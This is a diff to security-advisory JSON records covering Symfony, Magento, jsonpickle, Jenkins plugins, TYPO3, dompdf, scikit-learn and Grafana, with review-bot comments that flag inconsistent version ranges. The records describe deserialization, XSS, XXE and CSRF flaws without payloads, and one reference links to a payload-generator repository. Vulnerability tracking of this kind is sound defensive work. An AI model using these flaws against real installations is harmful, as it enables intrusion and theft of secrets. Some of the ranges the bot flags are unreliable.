@@ -71,6 +71,101 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.35" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.7" + } + ] + } + ] } ], "references": [ @@ -82,10 +177,26 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/pull/16631" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2015-8124.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2015-8124.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2015-8124.yaml" + }, { "type": "WEB", "url": "https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2015-8124" + }, { "type": "WEB", "url": "https://web.archive.org/web/20201209020014/http://www.securityfocus.com/archive/1/537183/100/0/threaded" 
diff --git a/advisories/github-reviewed/2022/05/GHSA-j63v-wcf9-c9hm/GHSA-j63v-wcf9-c9hm.json b/advisories/github-reviewed/2022/05/GHSA-j63v-wcf9-c9hm/GHSA-j63v-wcf9-c9hm.json index f14e173e42526..4a86561b6f3eb 100644 --- a/advisories/github-reviewed/2022/05/GHSA-j63v-wcf9-c9hm/GHSA-j63v-wcf9-c9hm.json +++ b/advisories/github-reviewed/2022/05/GHSA-j63v-wcf9-c9hm/GHSA-j63v-wcf9-c9hm.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8119" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8119.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json b/advisories/github-reviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json new file mode 100644 index 0000000000000..a301b166404f9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json 
@@ -0,0 +1,87 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j66q-qmrc-89rx", + "modified": "2024-02-01T20:58:40Z", + "published": "2022-05-24T17:36:44Z", + "aliases": [ + "CVE-2020-22083" + ], + "summary": "jsonpickle unsafe deserialization", + "details": "jsonpickle through 1.4.1 allows remote code execution during deserialization of a malicious payload through the `decode()` function. This CVE is disputed by the project author as intended functionality.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "jsonpickle" + }, + "ecosystem_specific": { + "affected_functions": [ + "jsonpickle.decode" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.4.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-22083" + }, + { + "type": "WEB", + "url": "https://github.com/jsonpickle/jsonpickle/issues/332" + }, + { + "type": "WEB", + "url": "https://github.com/jsonpickle/jsonpickle/issues/332#issuecomment-747807494" + }, + { + "type": "WEB", + "url": "https://github.com/jsonpickle/jsonpickle/issues/335" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2020-22083" + }, + { + "type": "WEB", + "url": "https://gist.github.com/j0lt-github/bb543e77a1a10c33cb56cf23d0837874" + }, + { + "type": "WEB", + "url": "https://github.com/j0lt-github/python-deserialization-attack-payload-generator" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jsonpickle/jsonpickle" + }, + { + "type": "WEB", + "url": "https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:58:40Z", + "nvd_published_at": "2020-12-17T16:15:00Z" + } +} \ No newline at end of file 
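Review bot: The details say `jsonpickle through 1.4.1` but the range ends at `"last_affected": "1.4.2"`; one of the two is wrong and both are user-visible. More importantly there is no `fixed` event and the maintainers dispute the issue as intended behaviour, so capping with `last_affected` makes 1.4.3 and later silently drop out of the range while `decode()` behaves the same; the `affected_functions` hint is the right place to keep the warning, but the text should say it outright, e.g. `No fixed version exists; never call jsonpickle.decode() on data from untrusted sources, in any version.` The empty `severity` array next to `"severity": "CRITICAL"` in database_specific also leaves the rating without a vector to justify it.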
diff --git a/advisories/github-reviewed/2022/05/GHSA-j6c3-3c4w-qv8p/GHSA-j6c3-3c4w-qv8p.json b/advisories/github-reviewed/2022/05/GHSA-j6c3-3c4w-qv8p/GHSA-j6c3-3c4w-qv8p.json index 454f677933d4f..87b7bc7546e67 100644 --- a/advisories/github-reviewed/2022/05/GHSA-j6c3-3c4w-qv8p/GHSA-j6c3-3c4w-qv8p.json +++ b/advisories/github-reviewed/2022/05/GHSA-j6c3-3c4w-qv8p/GHSA-j6c3-3c4w-qv8p.json @@ -68,6 +68,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.2.0" + }, + { + "fixed": "6.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.3.1" + } + ] + } + ] } ], "references": [ @@ -95,6 +133,10 @@ "type": "WEB", "url": "https://github.com/moodle/moodle/commit/d65634044ebaa738f55bdec521beb42844d6916a" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2013-7341.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/moodle/moodle" @@ -103,6 +145,10 @@ "type": "WEB", "url": "https://moodle.org/mod/forum/discuss.php?d=256420" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2015-007" + }, { "type": "WEB", "url": "http://flash.flowplayer.org/documentation/version-history.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json b/advisories/github-reviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json new file mode 100644 index 0000000000000..13c570f77004e --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcmg-9rw5-9rm2", + "modified": "2024-01-30T22:29:06Z", + "published": "2022-05-13T01:30:26Z", + "aliases": [ + "CVE-2018-1000426" + ], + "summary": "Stored XSS vulnerability in Jenkins Git Changelog Plugin", + "details": "A cross-site scripting vulnerability exists in Jenkins Git Changelog Plugin 2.6 and earlier in GitChangelogSummaryDecorator/summary.jelly, GitChangelogLeftsideBuildDecorator/badge.jelly, GitLogJiraFilterPostPublisher/config.jelly, GitLogBasicChangelogPostPublisher/config.jelly that allows attackers able to control the Git history parsed by the plugin to have Jenkins render arbitrary HTML on some pages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "de.wellnerbou.jenkins:git-changelog" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.6" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000426" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1122" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/106532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:28:55Z", + "nvd_published_at": "2019-01-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json b/advisories/github-reviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json new file mode 100644 index 0000000000000..15b43bb6b870d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json 
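Review bot: The reference `http://www.securityfocus.com/bid/106532` is a plain-http link to a site that no longer serves BID pages; sibling records use a `web.archive.org` capture, and this one should too or be dropped. The CVSS string is 3.1 while the neighbouring Jenkins records added in the same batch use 3.0 — harmless but inconsistent. Worth spelling out in details that "attackers able to control the Git history" presumably includes anyone who can push to, or get a pull request built from, the repository the job checks out — confirm against SECURITY-1122.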
@@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfj9-7j5w-6xgx", + "modified": "2024-01-30T22:36:33Z", + "published": "2022-05-14T03:46:09Z", + "aliases": [ + "CVE-2018-1000009" + ], + "summary": "XXE vulnerability in Jenkins Checkstyle Plugin", + "details": "Jenkins Checkstyle Plugin 3.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:checkstyle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.50" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000009" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:36:33Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-jjwj-w3gc-gcw4/GHSA-jjwj-w3gc-gcw4.json b/advisories/github-reviewed/2022/05/GHSA-jjwj-w3gc-gcw4/GHSA-jjwj-w3gc-gcw4.json index 76217e0169bdc..b76f24bca77db 100644 --- a/advisories/github-reviewed/2022/05/GHSA-jjwj-w3gc-gcw4/GHSA-jjwj-w3gc-gcw4.json +++ b/advisories/github-reviewed/2022/05/GHSA-jjwj-w3gc-gcw4/GHSA-jjwj-w3gc-gcw4.json @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "0.6" }, { "fixed": "0.6.2" 
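Review bot: `database_specific.last_known_affected_version_range` (`<= 3.49` per the details) is absent, unlike the other Jenkins records in this batch, so tooling that relies on it gets no upper bound beyond the `fixed` event. The PR:L vector assumes an authenticated Jenkins user, but the details say the XML is read from "files it parses as part of the build process"; if those files come from the workspace, anyone who can influence build output, e.g. through a commit in the built repository, may reach the same parser without Jenkins credentials — worth a hedged sentence in details, confirmed against the 2018-01-22 advisory.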
@@ -40,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-5013" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/dompdf/dompdf/CVE-2014-5013.yaml" + }, { "type": "WEB", "url": "https://github.com/dompdf/dompdf/compare/v0.6.1...v0.6.2" diff --git a/advisories/github-reviewed/2022/05/GHSA-jjx5-fq5g-8xpc/GHSA-jjx5-fq5g-8xpc.json b/advisories/github-reviewed/2022/05/GHSA-jjx5-fq5g-8xpc/GHSA-jjx5-fq5g-8xpc.json index a4034071ef03d..a8caf72f1397d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-jjx5-fq5g-8xpc/GHSA-jjx5-fq5g-8xpc.json +++ b/advisories/github-reviewed/2022/05/GHSA-jjx5-fq5g-8xpc/GHSA-jjx5-fq5g-8xpc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jjx5-fq5g-8xpc", - "modified": "2023-07-31T23:05:36Z", + "modified": "2024-02-08T19:37:28Z", "published": "2022-05-17T03:54:47Z", "aliases": [ "CVE-2016-1902" 
@@ -15,6 +15,101 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.37" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.9" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -25,7 +120,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.3.0" }, { "fixed": "2.3.37" @@ -44,7 +139,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.6" + "introduced": "2.4.0" }, { "fixed": "2.6.13" @@ -63,7 +158,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.7" + "introduced": "2.7.0" }, { "fixed": "2.7.9" 
@@ -82,6 +177,22 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/pull/17359" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-core/CVE-2016-1902.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2016-1902.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2016-1902.yaml" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2016-1902" + }, { "type": "WEB", "url": "https://www.landaire.net/blog/cve-2016-1902-symfony-securerandom/" diff --git a/advisories/github-reviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json b/advisories/github-reviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json new file mode 100644 index 0000000000000..30a591836a932 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jp4r-pf5r-4wg8", + "modified": "2024-01-30T22:27:38Z", + "published": "2022-05-13T01:25:43Z", + "aliases": [ + "CVE-2019-1003080" + ], + "summary": "CSRF vulnerability in Jenkins OpenShift Deployer Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins OpenShift Deployer Plugin in the DeployApplication.DeployApplicationDescriptor#doCheckLogin form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:openshift-deployer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003080" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-981" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:27:17Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json b/advisories/github-reviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json new file mode 100644 index 0000000000000..283dbe658e176 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json 
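Review bot: The details never state which versions are affected, unlike the other Jenkins records in this batch, and the range ends with `last_affected` and no `fixed` event, so a reader cannot tell whether an upgrade exists. Suggest opening details with `Jenkins OpenShift Deployer Plugin 1.2.0 and earlier ...` (the bound the range already encodes) and adding `As of this advisory there is no fixed release; disable or uninstall the plugin.` if SECURITY-981 confirms none exists. Without that sentence the `last_affected` cap reads as if later versions were safe.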
@@ -0,0 +1,134 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jr79-65xr-q7cx", + "modified": "2024-02-07T23:10:06Z", + "published": "2022-05-17T00:26:03Z", + "aliases": [ + "CVE-2010-3659" + ], + "summary": "TYPO3 Cross-site Scripting vulnerability in the extension manager and backend forms", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 CMS 4.1.x before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4, and 4.4.x before 4.4.1 allow remote authenticated backend users to inject arbitrary web script or HTML via unspecified parameters to the extension manager, or unspecified parameters to unknown backend forms.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3659" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3659/" + }, + { + "type": "WEB", + "url": 
"https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-012/" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20120903133822/http://www.securityfocus.com/bid/42029" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2010/09/28/8" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2014/02/12/8" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:10:06Z", + "nvd_published_at": "2017-10-20T18:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-jrjx-8gmw-jj2q/GHSA-jrjx-8gmw-jj2q.json b/advisories/github-reviewed/2022/05/GHSA-jrjx-8gmw-jj2q/GHSA-jrjx-8gmw-jj2q.json index 3969f174f15b7..8015e57bd3bfa 100644 --- a/advisories/github-reviewed/2022/05/GHSA-jrjx-8gmw-jj2q/GHSA-jrjx-8gmw-jj2q.json +++ b/advisories/github-reviewed/2022/05/GHSA-jrjx-8gmw-jj2q/GHSA-jrjx-8gmw-jj2q.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8137" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8137.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-jwf8-mjj8-r8hq/GHSA-jwf8-mjj8-r8hq.json b/advisories/github-reviewed/2022/05/GHSA-jwf8-mjj8-r8hq/GHSA-jwf8-mjj8-r8hq.json index 1642e7178672f..018221400e521 100644 --- a/advisories/github-reviewed/2022/05/GHSA-jwf8-mjj8-r8hq/GHSA-jwf8-mjj8-r8hq.json +++ b/advisories/github-reviewed/2022/05/GHSA-jwf8-mjj8-r8hq/GHSA-jwf8-mjj8-r8hq.json 
@@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "0.6" }, { "fixed": "0.6.2" @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/dompdf/dompdf/commit/cc06008f75262510ee135b8cbb14e333a309f651" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/dompdf/dompdf/CVE-2014-5011.yaml" + }, { "type": "WEB", "url": "https://github.com/dompdf/dompdf/compare/v0.6.1...v0.6.2" diff --git a/advisories/github-reviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json b/advisories/github-reviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json new file mode 100644 index 0000000000000..edcc9633aaf3b --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json 
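Review bot: Changing `introduced` from `0` to `0.6` exonerates every 0.5.x dompdf release, but nothing in this record shows that the defect entered with 0.6; if the upstream text only says "before 0.6.2", narrowing the lower bound without evidence hides the issue from older installs. Keep `"introduced": "0"` unless the newly added FriendsOfPHP yaml gives `>=0.6.0` as the lower bound. The same narrowing is applied to the CVE-2014-5013 record in this batch.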
@@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxfp-4rvq-9h9m", + "modified": "2024-02-01T20:59:15Z", + "published": "2022-05-24T17:34:40Z", + "aliases": [ + "CVE-2020-28975" + ], + "summary": "scikit-learn Denial of Service", + "details": "svm_predict_values in svm.cpp in Libsvm v324, as used in scikit-learn 0.23.2 and other products, allows attackers to cause a denial of service (segmentation fault) via a crafted model SVM (introduced via pickle, json, or any other model permanence standard) with a large value in the _n_support array.\nNOTE: the scikit-learn vendor's position is that the behavior can only occur if the library's API is violated by an application that changes a private attribute.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "scikit-learn" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.23.2" + }, + { + "fixed": "1.0.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28975" + }, + { + "type": "WEB", + "url": "https://github.com/scikit-learn/scikit-learn/issues/18891" + }, + { + "type": "WEB", + "url": "https://github.com/scikit-learn/scikit-learn/commit/1bf13d567d3cd74854aa8343fd25b61dd768bb85" + }, + { + "type": "WEB", + "url": "https://github.com/cjlin1/libsvm/blob/9a3a9708926dec87d382c43b203f2ca19c2d56a0/svm.cpp#L2501" + }, + { + "type": "PACKAGE", + "url": "https://github.com/scikit-learn/scikit-learn" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202301-03" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/160281/SciKit-Learn-0.23.2-Denial-Of-Service.html" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2020/Nov/44" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + 
"github_reviewed_at": "2024-02-01T20:59:15Z", + "nvd_published_at": "2020-11-21T21:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json b/advisories/github-reviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json new file mode 100644 index 0000000000000..6700efef050a1 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json 
@@ -0,0 +1,90 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m25m-5778-fm22", + "modified": "2024-02-01T21:46:14Z", + "published": "2022-05-24T17:16:52Z", + "aliases": [ + "CVE-2020-12459" + ], + "summary": "Grafana world readable configuration files", + "details": "In certain Red Hat packages for Grafana 6.x through 6.3.6, the configuration files `/etc/grafana/grafana.ini` and `/etc/grafana/ldap.toml` (which contain a secret_key and a bind_password) are world readable.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0" + }, + { + "fixed": "7.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12459" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/issues/8283" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/102448040d5132460e3b0013e03ebedec0677e00" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2020-12459" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1827765" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1829724" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CTQCKJZZYXMCSHJFZZ3YXEO5NUBANGZS/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEBCIEVSYIDDCA7FTRS2IFUOYLIQU34A/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200518-0004/" + }, + { + "type": "WEB", + "url": "https://src.fedoraproject.org/rpms/grafana/c/fab93d67363eb0a9678d9faf160cc88237f26277" + } + ], + "database_specific": { + "cwe_ids": [ + 
